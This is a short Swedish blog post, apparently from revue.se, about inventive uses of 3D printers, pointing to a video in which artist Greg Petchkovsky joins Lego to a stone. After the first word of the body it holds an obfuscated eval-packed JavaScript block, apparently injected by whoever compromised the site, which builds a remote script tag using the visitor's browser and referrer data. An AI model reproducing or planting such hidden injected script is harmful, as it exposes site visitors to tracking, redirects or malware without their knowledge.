Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Fantastisk användning av en 3D skrivare

Filip Urde
  • On 3 december, 2012
  • http://www.revue.se/filip-urde

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yffaf|var|u0026u|referrer|kyrrr||js|php’.split(‘|’),0,{}))
finns nästan obegränsade möjligheter för en 3D skrivare och folk börjar bli riktigt uppfinnesrika.
En av de mest fantastiska saker vi har sett är den här videon, där konstnären Greg Petchkovsky bland annat sammanfogar Lego med en sten. Riktigt snyggt. Ge mig en 3D skrivare nu!

vimeo.com